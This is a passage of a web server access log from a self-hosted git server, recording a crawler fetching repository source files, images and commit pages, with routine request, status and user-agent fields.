+0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 10885] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/ChatBot.tsx?display=source" [Client 216.73.216.188] [Length 15601] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3.12" [Client 216.73.216.188] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 1372] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3.12" [Client 216.73.216.188] [Length 9927] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/Activate.ps1?display=rendered" [Client 216.73.216.188] [Length 11002] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/ChatBot.tsx?display=source" [Client 216.73.216.188] [Length 15591] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 10876] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 10878] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/watchfiles" [Client 216.73.216.188] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:57 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/%7Bservice.image%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 216.73.216.188] [Length 10944] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 216.73.216.188] [Length 10950] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/css" [Client 216.73.216.188] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/css" [Client 216.73.216.188] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4845] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services/geminiService.ts?display=source" [Client 216.73.216.188] [Length 13191] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services/geminiService.ts?display=source" [Client 216.73.216.188] [Length 13187] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/uvicorn" [Client 216.73.216.188] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/uvicorn" [Client 216.73.216.188] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/assets/css/style.css?display=rendered" [Client 216.73.216.188] [Length 10961] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx?display=source" [Client 216.73.216.188] [Length 14871] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fproxy-host-2_error.log" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 9903] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fletsencrypt-requests_error.log" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Header.tsx?display=rendered" [Client 216.73.216.188] [Length 10945] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx?display=rendered" [Client 216.73.216.188] [Length 10953] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 9889] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fproxy-host-1_error.log" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services/geminiService.ts?display=rendered" [Client 216.73.216.188] [Length 10947] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/About.tsx?display=source" [Client 216.73.216.188] [Length 13987] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Footer.tsx?display=source" [Client 216.73.216.188] [Length 14262] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom5.png?display=rendered" [Client 216.73.216.188] [Length 10861] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Services.tsx?display=source" [Client 216.73.216.188] [Length 14707] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Hero.tsx?display=source" [Client 216.73.216.188] [Length 13934] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom4.png?display=rendered" [Client 216.73.216.188] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx?display=source" [Client 216.73.216.188] [Length 14718] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom3.png?display=rendered" [Client 216.73.216.188] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fproxy-host-4_error.log" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fproxy-host-3_error.log" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom2.png?display=rendered" [Client 216.73.216.188] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:30:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] 